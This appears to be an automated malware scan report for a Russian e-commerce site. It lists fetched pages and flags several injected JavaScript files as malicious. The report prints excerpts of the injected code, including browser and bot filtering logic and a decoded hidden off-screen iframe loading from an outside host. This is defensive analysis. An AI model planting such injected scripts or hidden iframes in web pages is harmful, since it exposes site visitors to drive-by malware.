Scanned pages/files
Request | Server response | Status |
http://somresurs.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:33 GMT Location: http://www.somresurs.ru/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/ | 200 OK Content-Length: 65411 Content-Type: text/html | clean |
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_main/kernel_main.js?1385123422307042 | 200 OK Content-Length: 303537 Content-Type: application/javascript | clean |
http://somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:36 GMT Location: http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 367 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119 | 200 OK Content-Length: 95119 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros Antivirus reports:
| ||
http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:36 GMT Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 401 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999 | 200 OK Content-Length: 2999 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ; ; (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh' function BxShowAuthFloat(id, suffix) { var bCreated = false; if(!bxAuthWnd) { bxAuthWnd = new BX.CDialog({ 'content':'<div id="bx_auth_float_container"></div>', 'width': 640, 'height': 400, 'resizable': false }); bCreated = true; } bxAuthWnd.Show(); if(bCreated) BX('bx_auth_float_container').appendChild(BX('bx_auth_float')); BxShowAuthService(id, suffix); } ; Decoded script: <iframe src=http://jaxworks.ru/ghj5.u35hh55hj?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:36 GMT Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 476 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607 | 200 OK Content-Length: 106607 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(".tabsblock > .tabs > a").live('click', function() { var ind = $(this).index(); ind++; if ($(this).hasClass("active")){} else { $(this).parents('.tabsblock').find('.active').removeClass('active') $(this).addClass('active'); $(".tabsblock").find(".cnt:nth-child("+ind+")").addClass('active'); } return false; }); $("#notify_auth_form > .social > form > ul > li > a").live('click', function() { setTimeout(function() this.WAIT.style.backgroundImage = "url('" + this.arParams.WAIT_IMAGE + "')"; if(!BX.browser.IsIE()) this.WAIT.style.backgroundRepeat = 'none'; this.WAIT.style.display = 'none'; this.WAIT.style.position = 'absolute'; this.WAIT.style.zIndex = '1100'; } setTimeout(this.onTimeout, 500); } BX.ready(function (){_this.Init(arParams)}); } ;; ; ; ; ; ; ; Antivirus reports:
| ||
http://somresurs.ru/about/how_to_order/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:04:37 GMT Location: http://www.somresurs.ru/about/how_to_order/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.somresurs.ru/about/how_to_order/ | 200 OK Content-Length: 45518 Content-Type: text/html | clean |
http://www.somresurs.ru/about/delivery/ | 200 OK Content-Length: 45077 Content-Type: text/html | clean |
http://www.somresurs.ru/about/vacancy/ | 200 OK Content-Length: 45391 Content-Type: text/html | clean |
http://www.somresurs.ru/about/price/ | 200 OK Content-Length: 140092 Content-Type: text/html | clean |
http://www.somresurs.ru/about/contacts/ | 200 OK Content-Length: 46045 Content-Type: text/html | clean |
http://www.somresurs.ru//api-maps.yandex.ru/services/constructor/1.0/js/?sid=w0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc&width=600&height=450/ | 404 Not Found Content-Length: 41450 Content-Type: text/html | clean |
http://www.somresurs.ru/login/?backurl=%2Fapi-maps.yandex.ru%2Fservices%2Fconstructor%2F1.0%2Fjs%2F%3Fsid%3Dw0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc%26width%3D600%26height%3D450%252F | 200 OK Content-Length: 50538 Content-Type: text/html | clean |
http://www.somresurs.ru/login/?backurl=%2Flogin%2F | 200 OK Content-Length: 49422 Content-Type: text/html | clean |
http://www.somresurs.ru/login/?register=yes&backurl=%2Flogin%2F | 200 OK Content-Length: 46896 Content-Type: text/html | suspicious |
Suspicious code found <form method="post" action="/login/?register=yes&backurl=%2Flogin%2F" name="bform"> <input type="hidden" name="backurl" value="/login/?backurl=%2Flogin%2F" /> <input type="hidden" name="AUTH_FORM" value="Y" /> <input type="hidden" name="TYPE" value="REGISTRATION" /> Èìÿ<br> <input type="text" name="USER_NAME" maxlength="50" value="" /><br/><br/> Ôàìèëèÿ<br> <input type="text" <input type="text" name="captcha_word" maxlength="50" value="" /> <p style="clear: left;"><input type="hidden" name="captcha_sid" value="01468dcf3071f386fc33eab6f4d0ca61" /> <img src="/bitrix/tools/captcha.php?captcha_sid=01468dcf3071f386fc33eab6f4d0ca61" width="180" height="40" alt="CAPTCHA" /></p> <input type="submit" class="bt3" style="width:100%;" name="Register" value="Çàðåãèñòðèðîâàòüñÿ" /> </form> | ||
http://www.somresurs.ru/personal/cart/ | 200 OK Content-Length: 45307 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: somresurs.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
...310 bytes of data.
GET / HTTP/1.1
Host: somresurs.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
...310 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: somresurs.ru
Referer: http://www.google.com/search?q=somresurs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: somresurs.ru
Referer: http://www.google.com/search?q=somresurs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=somresurs.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://somresurs.ru/
Result: somresurs.ru is not infected or malware details are not published yet.
Result: somresurs.ru is not infected or malware details are not published yet.